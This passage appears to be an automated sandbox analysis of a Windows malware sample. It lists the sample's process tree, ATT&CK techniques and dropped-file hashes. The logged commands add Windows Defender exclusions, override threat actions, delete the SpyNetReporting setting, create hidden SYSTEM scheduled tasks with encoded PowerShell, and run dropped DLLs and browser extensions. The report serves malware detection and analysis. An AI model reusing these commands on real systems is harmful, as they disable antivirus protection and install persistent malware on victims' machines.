C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4136
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3556
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DufnooWHNFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DufnooWHNFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IAvstfEYU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IAvstfEYU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNdNVmbTRKpEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNdNVmbTRKpEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gNEkwGGiCnIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gNEkwGGiCnIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cvDkMpEVJyabfeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cvDkMpEVJyabfeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fgekRaJKKiJdEvwV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fgekRaJKKiJdEvwV\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3508 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:323⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cvDkMpEVJyabfeVB /t REG_DWORD /d 0 /reg:643⤵PID:3452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fgekRaJKKiJdEvwV /t REG_DWORD /d 0 /reg:323⤵PID:2412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fgekRaJKKiJdEvwV /t REG_DWORD /d 0 /reg:643⤵PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw /t REG_DWORD /d 0 /reg:643⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw /t REG_DWORD /d 0 /reg:323⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cvDkMpEVJyabfeVB /t REG_DWORD /d 0 /reg:323⤵PID:4408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:643⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:323⤵PID:2788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:643⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:323⤵PID:3572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:643⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:643⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:323⤵PID:1328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:643⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:323⤵PID:4952
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3572
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNSudLbIG"2⤵PID:4480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNSudLbIG" /SC once /ST 09:03:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNSudLbIG"2⤵PID:1720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HddpujWaDpLIbkLdt" /SC once /ST 14:41:18 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TPkxaYo.exe\" gT /VEsite_idtyf 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HddpujWaDpLIbkLdt"2⤵PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5040
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3512
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4372
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:321⤵PID:3192
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4144
-
C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TPkxaYo.exeC:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TPkxaYo.exe gT /VEsite_idtyf 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmfUAJAHieefCXsdaD"2⤵PID:3244
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3308
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2200
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1128
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IAvstfEYU\HPPXrz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gcsaRhxvmhmmEZS" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcsaRhxvmhmmEZS2" /F /xml "C:\Program Files (x86)\IAvstfEYU\NBWSAaH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gcsaRhxvmhmmEZS"2⤵PID:4264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcsaRhxvmhmmEZS"2⤵PID:4864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GQBvHPrMcnsQR2" /F /xml "C:\ProgramData\cvDkMpEVJyabfeVB\RyoANsR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IsxNCaiPdRDTBP" /F /xml "C:\Program Files (x86)\gNEkwGGiCnIU2\BThYRuO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FDSsfUJUNzWcTDuAR2" /F /xml "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\IqHUwPy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mTrzZzYaKbZcxyPVaUZ2" /F /xml "C:\Program Files (x86)\WNdNVmbTRKpEC\LOkkeeb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "drPQSDndGmRZEFerX" /SC once /ST 07:47:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fgekRaJKKiJdEvwV\EcfHfwby\dDDwQWN.dll\",#1 /QFsite_idtbI 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "drPQSDndGmRZEFerX"2⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2684
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3556
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HddpujWaDpLIbkLdt"2⤵PID:924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2004
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3456
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:1680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2624
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\fgekRaJKKiJdEvwV\EcfHfwby\dDDwQWN.dll",#1 /QFsite_idtbI 3851181⤵
- Blocklisted process makes network request
PID:3204 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\fgekRaJKKiJdEvwV\EcfHfwby\dDDwQWN.dll",#1 /QFsite_idtbI 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "drPQSDndGmRZEFerX"3⤵PID:2788
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
6Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5ad6c19bb535e3e59e893a58179e22797
SHA1315a3cf56db6f073f89a22fe79461a94de96ef77
SHA256a9111872866006835589336c207a312618387ee457b2d1906bd452e0a4542291
SHA512d54e86125374b16390bbba57c360436e70f5b5b59e33c789c47dd5109da57bdd59449839f6d2be1455fa2c3d9c5d8f1688f093196be06d8faf3794c27dd87708
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
177KB
MD579bff1c1e0d131418a493ae38056918c
SHA13ffe6c78c3f7805ddcd65988ebfc8f4841b6ff05
SHA2565c0ed5a4711f08c33f5c4d15acc5fba84a8457a8adcc2100da7a9d27f65c4bae
SHA512bd90dee8e5c3d863d40e3ad7992c211acb08f878b46d75032d8c907f08de66e689e4f6805159b5557bb250a3ca5474289ba2e84ccf02fa5f0d5e4b5b46e7110e
-
Filesize
275KB
MD5f8f201543c1548ad1db0240618a82cfb
SHA12104531a9e824d2d13dc35d6d0fe899d9b344c17
SHA256d14ecf0d628952ebe137631021e541ec83bc4ffec4537abdb524707f940058b5
SHA5121e8a28246e6a13393ea3b346364cce2fda8960dc0a2707170d46430159bc5d71a183550d84354dad7456380683667585fc9fb4ade08e5bcd6b7a316f936e59d2
-
Filesize
195KB
MD5f38331e0c62df4df9270fd646324c512
SHA141efba8de3db44e6db464fd4acd8848774413325
SHA256eda214d405625f144fba0722edbf84d26501780a852fedca309d2359c188a9fd
SHA512706b6d4f4ef9020262a845e43bafef355bbef44da97e38f14975d49139c330e04b131e2d1a07c9958fb5f36ba2510713df50a485f80863578bbc2af82d709491
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5ad5928c418205f33e6394f24e5f12d76
SHA14c82569b1e0cf49da0acf29efe9abb4e023d7afc
SHA256fbff3e020cb0df5f2a981d0445e95a80c51da1c5b6f6e6a460d53009c7230ceb
SHA5122339ad6841fc43ed7bf44e74c83f4df7bbcc653470d6e530c591bdf09c6833dde8741890defdcf34e4799af19490bc501bc015c0c8c7cdb1efa465ef4a060189
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5c62014cf5dd988191bf2582412cd8a60
SHA18db64ca6ed2ffc5c7461834faa693f8fd0aed2b7
SHA25657a7fa9b66d8cf7fd9f4fa744f8430706611df5f61cd5b8a368bf700c6beb7c3
SHA512e7eb6d7e94d34bbc33eb3124ea44c035fd4cab0737ea6010197f4233672e67f0271392d150b85e2e84db78e3415754e7bfa637d718ea0ac91895597e0deec869
-
Filesize
21KB
MD5bce8844b1bd0514e5b7b8d4f3e522dd9
SHA1806524c5a8f5e1efa0533c8bd31e180aecc1a83f
SHA256ffb42f21464d299e5349ede9b200799e56b4c5d6c20daffef33d8f82077fc737
SHA51299b916fae3a777f499942350279228882858869355f0068a9aaabc1d44b2d494260cbfe2a375bcc2970dd500b0a90e4a22e613a909cbc42ea254e71bf2f7f146
-
Filesize
18KB
MD50cb4ce73dc6f5623f69bf0ec15676287
SHA1b0ba699879f9689817c99391a7123059a8b268df
SHA256a236c830d376c874cd5bb0f5e118c784cac2154561f8aee9dff0dcb49590f052
SHA512e9923c056e45bb035c291cc7e1c4f8fd4968d3615fcabb5067e94e9a45e5fc71b93d669ad87135a4a34a92dd4fa01d520cf13ea7302a0a0d4fd4fd0a550a491e
-
Filesize
219KB
MD5c6bafbf0020f6477685237cad72732b0
SHA1be928641942333e934d621fd6fc2c3a6d95d7193
SHA2567996847dbd47e02298de85cde4cdbe55614be8c9a5d6fe5d0b1b621b3dd20f90
SHA512ff76ac9a6ac35c0f9311d0fed316077664f5ff1ec7fa2b11afebd4ff7f517d6fb7b7af24e2ed8c137a09c8bf2465e26ace3e768395f02a61644af91817c95340
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\additional_file0.tmp
Filesize107KB
MD5690d947dcbbb9a99c308472c4bd1ce9f
SHA1d4349d5e3341796febbbea2ddb8f9ac2ca3f4b75
SHA256ef4dbbae0c3ab8f28809ce1c9ff2434f06ae0a2a974e0ce95db7675a59d18b05
SHA512f3b4b7fc74f9c80ef8b8ad426a56f04ddd37b5b32cf52b8ed62e36ae4fd48ce02e35cf5016d75a50f4bc1f034a5b401378bd6cf4ff66c74339bd0c69f31839ea
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
Filesize104KB
MD5730d227ce17ed4e7bb5b83ab61f489cd
SHA1bf422fd759cf6b962802327b5ec0003b241a9e0c
SHA25628f04b34705b95fc4e971395687d0caea9d439187cfd666bb0fe04e2d9fb4670
SHA512ff9e0f9a62718edda725f988b7440e5bef60801bc5a095d7ead4c345978992044117625185e55ab2371344fd7dda896dce774a3f59752348a2a833369433eee8
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
Filesize144KB
MD5888c420b3de0d326520c9e065a1a650c
SHA13bdfa50139ea34b28578b422b76eaafd7513d7fa
SHA256a3ff45f614cc293d42bdf138c1938b9732515c04ca8a6e95184872f189978c7f
SHA512dfaabc69031aa3d80f357907a112e0d9a8f72a173f32545b5f02ca979186d414f5c75c0563874e9d7b1022c6babccb600affac785cd26e08c5caac6708852cca
-
